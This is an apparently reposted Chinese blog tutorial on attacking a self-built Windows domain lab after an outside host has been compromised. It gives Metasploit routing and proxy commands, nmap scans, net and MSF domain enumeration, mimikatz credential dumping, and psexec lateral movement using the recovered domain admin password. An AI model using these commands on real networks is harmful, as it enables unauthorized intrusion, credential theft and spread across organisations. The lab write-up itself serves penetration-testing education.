一、環境
域環境是自己搭的,基本模仿的企業部署
域:learn.com
作業系統型別 IP地址 本地賬戶/密碼 域賬戶/密碼 角色
Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator DC域控
win@2008.com win@2008.com
Windows 2003 網卡1:192.168.138.130 Administrator/ learn\win2003 域主機/
網卡2:192.168.47.159 root win@2003 外網站點服務器
Windows XP 192.168.138.131 Administrator/ learn\winxp 域內主機
root xp@123.com
二、滲透步驟
ps:由于是內網測驗,前面的外網打入內網的步驟就省略了哈! 即假設攻擊者已控制了windows 2003主機,
2.1 資訊收集
2.1.1 IP-域 資訊
資訊整理
賬戶: learn\win2003
域: learn.com
內網IP: 192.168.138.130
外網IP: 192.168.47.159
域控制器DC的IP: 192.168.138.129
另一臺域內主機: 192.168.138.131
C:\Documents and Settings\win2003\����>ping learn.com
Pinging learn.com [192.168.138.129] with 32 bytes of data:
Reply from 192.168.138.129: bytes=32 time<1ms TTL=128
內網主機發現:
1、在metepreter的shell里執行: for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.138.%I | findstr "TTL="
2、建立路由-代理進行內網掃描(參考 2.1.2節 )
2.1.2 建立路由-代理
run autoroute -s 192.168.138.0/24 #通過當前session建立一條通往內網網段的路由
run autoroute -p
方法一:msf自帶的掃描模塊
主機發現:(自己用來看看效果吧!)
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/netbios/nbname
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep
埠掃描:
use auxiliary/scanner/portscan/ack
服務掃描:自己挑著用吧!
search auxiliary/scanner/
方法二:設定 proxychains代理
use auxiliary/server/socks4a
set SRVPORT 3333
run
vi/etc/proxychains.conf
socks4 192.168.47.147 3333
sudo proxychains3 nmap -Pn -sS 192.168.138.0/24(由于在域內,單純的掃描可能識別不到,可參考附帶一些常用埠去掃描)
sudo proxychains3 nmap -Pn -sS 192.168.138.129 -p 3389,445
2.1.3 域用戶資訊收集
常用指令
ipconfig /all 查看本機ip,所在域
route print 列印路由資訊
net view 查看局域網內其他主機名
arp -a 查看arp快取
net start 查看開啟了哪些服務
net share 查看開啟了哪些共享
net share ipc$ 開啟ipc共享
net share c$ 開啟c盤共享
net use \\192.168.xx.xx\ipc$ "" /user:"" 與192.168.xx.xx建立空連接
net use \\192.168.xx.xx\c$ "密碼" /user:"用戶名" 建立c盤共享
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盤user目錄下的檔案
?
net config Workstation 查看計算機名、全名、用戶名、系統版本、作業站、域、登錄域
net user 查看本機用戶串列
net user /domain 查看域用戶
net localgroup administrators 查看本地管理員組(通常會有域用戶)
net view /domain 查看有幾個域
net user 用戶名 /domain 獲取指定域用戶的資訊
net group /domain 查看域里面的作業組,查看把用戶分了多少組(只能在域控上操作)
net group 組名 /domain 查看域中某作業組
net group "domain admins" /domain 查看域管理員的名字
net group "domain computers" /domain 查看域中的其他主機名
MSF模塊
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
資訊整理
域: learn.com
域用戶:Administrator Guest krbtgt win2003 winxp
利用msf內置的mimikatz提取賬戶密碼
load mimikatz #加載 mimkatz 模塊
help #查看命令
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds. #提取域賬戶密碼
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds. #提取記憶體里的賬戶密碼
meterpreter >
思考: 進入內網,我們更多的是想拿到域管理員賬戶權限,可以偽造證書進行PTT攻擊,或是直接獲取到明文密碼!!!
(前提,域內主機不存在系統級或是通用服務漏洞的時候)
2.2 內網橫向移動
2.2.1 dump記憶體中的明文密碼
為了方便獲取記憶體里的密碼,人為的利用域管理員賬戶訪問win2003外網服務器,
**這樣就獲取到了域管理員的賬戶和密碼: ** Administartor/win@2008.com
到這里,你基本可以在內網橫著走了!!!
比如前面我們知道內網還存在一臺主機 192.168.138.131
簡單演示:
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp #注意,在內網中,往往網路會受限制,通常使用 bind 系列的payload
set rhost 192.168.138.131
set rhosts 192.168.138.131
set smbdomain learn.com
set smbuser Administrator
set smbpass win@2008.com
set lport 5556
explort
三、總結
but:實際中,我們是獲取不到明文密碼的!中大型企業里基本不會在用win2008以下的主機了,
接下來,我們需要利用 PTH PTT攻擊 ,
寫累了,暫且就這樣吧這章!
后面會繼續補充 PTH PTT攻擊 這一部分,期待下吧!!!
PTH 和 PTT 攻擊
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/214957.html
標籤:其他